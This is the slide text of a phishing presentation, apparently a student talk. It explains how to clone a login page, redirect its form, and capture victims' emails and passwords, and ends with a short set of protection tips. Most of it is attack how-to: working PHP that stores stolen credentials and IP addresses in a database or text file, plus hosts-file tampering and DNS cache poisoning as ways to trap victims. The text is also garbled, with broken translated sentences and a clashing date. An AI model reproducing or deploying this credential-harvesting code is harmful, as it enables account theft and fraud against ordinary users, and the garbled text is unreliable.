Understanding Phishing Techniques
Understanding Phishing Techniques
Phishing
Prepared by:
Mohamed Amine RHOUMA
Marwen ZORGUI
11/11/2011 2010
2
Illegal
3
LOL …
4
Disclaimer
5
PLAN
What is Phishing??
Necessary preparation
Trap the victim
How to protect oneself??
6
PLAN
What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??
7
Definition
Concatenation of dephreaking (hacking of
telephone systems) and fishing
8
Principle of the attack
FAKE SITE:
The victim believes they are on a trustworthy site.
to enter his personal data, but in
In reality, he is sending them to the hackers.
computer science
9
Principle
10
Some statistics...
In 2007, phishing brought in 3.2 billion
dollars to the pirates
11
PLAN
What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??
12
Necessary preparation
Data storage
13
Creation of the misleading page
Recording of the original page with the
images and other files (CSS: Cascading
Style Sheets, JavaScript...
14
Creation of the deceptive page
15
Editing with Firebug
16
Creation of the misleading page
<form
method ="POST"
action="[Link]
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>
Becomes:
<form
method="POST" action=“[Link]" >
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>
17
Necessary preparation
18
Data storage
19
Database: creation
20
Database: PHP code
<?php
mysql_connect("localhost","root","");
mysql_select_db("madrid");
$a=$_POST["email"];
$b=$_POST["pass"];
$c=$_SERVER["REMOTE_ADDR"].
Header("Location: [Link]
?>
21
TXT file
<?php
$fp = fopen("[Link]", "a+");
fputs($fp,$_POST[email]);
fputs($fp," ");
fputs($fp,$_POST[pass]);
fputs($fp, " ");
fputs($fp," ");
fputs($fp,$_SERVER["REMOTE_ADDR"]);
fputs($fp, " ");
fclose($fp);
Header("Location:[Link]
?>
22
PLAN
What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??
23
24
Trap the victim
Trap mail
Fichier hosts
Etc.
25
Trap mail
Simple, quick and efficient
26
Hosts file
In the folder:
C:\Windows\System32\drivers\etc
27
hosts file
28
Binder: principle
[Link] [Link]
[Link] (Trapping)
29
hosts file
30
DNS Cache Poisoning
DNS servers have a cache that allows for
keep correspondence for a certain time
between a machine name and its IP address
31
Brief
Trap mail
Hosts File
DNS Cache poisoning
•…
32
PLAN
What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??
33
How to protect oneself??
34
How to protect oneself??
35
How to protect oneself??
One must be particularly vigilant when
one encounters a web address containing the
symbol ‘@’
For example, the address
[Link]
leads to [Link] and not to
[Link] as one could
to believe
36
How to protect oneself??
Only download programs from
official sites
Use an antivirus
37
Surprise!!
38
39
Thank you for your
attention !!
40